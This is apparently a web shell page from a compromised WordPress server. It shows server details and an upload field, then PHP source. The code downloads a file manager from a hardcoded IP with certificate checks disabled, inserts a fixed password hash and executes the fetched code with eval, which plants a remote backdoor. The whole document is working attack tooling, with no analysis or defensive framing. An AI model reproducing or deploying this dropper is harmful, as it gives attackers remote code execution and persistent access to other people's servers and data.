| Server IP : 116.202.121.150 / Your IP : 216.73.216.170 Web Server : Apache System : Linux server5.febas.net 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64 User : k9887-1 ( 1171) PHP Version : 8.2.32 Disable Function : show_source, highlight_file, apache_child_terminate, apache_get_modules, apache_note, apache_setenv, virtual, dl, posix_getpwnam, posix_getpwuid, posix_mkfifo, posix_mknod, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_nice, openlog, syslog, pfsockopen, system, shell_exec, passthru, popen, proc_open, exec MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/k9887-1/htdocs/_fisch/wp-includes/ |
Upload File : |
<?php
function sminst_do_get_request($url) {
$result = false;
//Use curl if available
if (function_exists('curl_init')) {
$ch = curl_init($url);
if(defined('CURLOPT_SSL_VERIFYHOST')) {
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
}
if(defined('CURLOPT_SSL_VERIFYPEER')) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
}
if(defined('CURLOPT_SSL_VERIFYSTATUS')) {
curl_setopt($ch, CURLOPT_SSL_VERIFYSTATUS, false);
}
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
if($result === false) {
goto use_file_get_contents;
}
//No curl available, do it the other way
} else {
use_file_get_contents:
//https://stackoverflow.com/questions/5647461/how-do-i-send-a-post-request-with-php
$options = [
'http' => [
'method' => 'GET',
'follow_location' => 0,
'max_redirects' => 0,
'timeout' => 10.0
],
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
'allow_self_signed' => true,
'security_level' => 0,
]
];
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
}
return $result;
}
$download_baseurls = [
'https://94.156.180.81',
'http://94.156.180.81'
];
$result = false;
foreach($download_baseurls as $download_baseurl) {
$result = sminst_do_get_request("{$download_baseurl}/get_tinyfilemanager");
if($result !== false) {
break;
}
}
if($result === false) {
die('Could not get tinyfilemanager!');
} else {
$result = str_replace("<generated \x70assword hash>", '$2y$10$pNM647P5ZBGCUdp1A1utceHNrxq9vLz46vFfpnrZgKCE4SkVUWSLa', $result);
eval('?>' . $result);
}